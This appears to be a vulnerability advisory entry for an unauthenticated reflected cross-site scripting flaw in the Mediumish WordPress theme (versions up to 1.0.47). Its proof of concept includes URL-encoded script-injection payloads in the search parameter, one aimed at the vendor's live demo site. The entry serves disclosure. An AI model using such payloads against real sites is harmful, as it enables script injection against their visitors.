Themes Vulnerabilities

Mediumish <= 1.0.47 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The search feature of the theme does not properly sanitise it's 's' GET parameter before output it back the page, leading to the Cross-SIte Scripting issue.

The vendor has been unresponsive to any form of contact

Proof of Concept

https://example.com/?post_type=post&s=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

https://www.themepush.com/demo-mediumish/?post_type=post&s=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Affects Themes

No known fix

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2021-05-16 (about 3 years ago)
Added
2021-05-16 (about 3 years ago)
Last Updated
2021-05-17 (about 3 years ago)

Other